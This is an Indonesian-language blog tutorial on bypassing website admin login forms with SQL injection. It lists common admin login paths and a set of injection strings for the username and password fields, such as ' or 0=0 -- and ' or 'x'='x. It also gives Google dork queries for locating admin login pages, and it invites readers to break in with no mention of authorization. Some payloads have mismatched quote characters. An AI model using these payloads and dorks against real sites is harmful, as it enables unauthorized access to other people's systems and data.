Setelah mempelajari SQL INJECTION sekarang kita mulai bermain Pentester yuck.. alangkah baiknya baca artikel ini dulu SQLINJECTION
pada tutorial kali ini gue ingin membahas IMPLEMENTASI SQL INJECTION
yaitu BYPASS LOGIN FORM dimana kita berusaha menembus login admin hanya dengan beberapa string saja,
berikut bypass login form
"/admin.asp","/login.asp","logon.asp","/adminlogin.asp","/adminlogon.asp","/admin_login.asp","/admin_logon.asp","/admin/admin.asp","/admin/login.asp","/admin/logon.asp"
contoh gue ambil salah satu dari string di atas
www.tutorialsql.com/admin
nah silakan agan pilih mau pake metode yang mana, kemudian masukan username dan password seperti berikut
User Name : admin
Password : `or `a'='a
atau bisa juga begini
User Name : `or `a'='a
Password : `or `a'='a
atau bisa masukan ke dua-duanya misal :
' or 0=0 -- ; ' or 0=0 -- ; or 0=0 -- ; or 0=0 # ; 'or 0=0 # ;' or 'x'='x ; ' or 'x'='x ; ') or ('x'='x
pada dasarnya variasi-variasi diatas disesuaikan dengan syntax SQL yang digunakan pada web tersebut karena pada dasarnya teknik ini memanipulasi syntax SQL yang ada.
contoh dork bypass login
inurl:"/admin/ site:
inurl:"/admin/ intext:"login" site:
segitu saja lebih lanjut agan bisa search di goolge.
No comments:
Post a Comment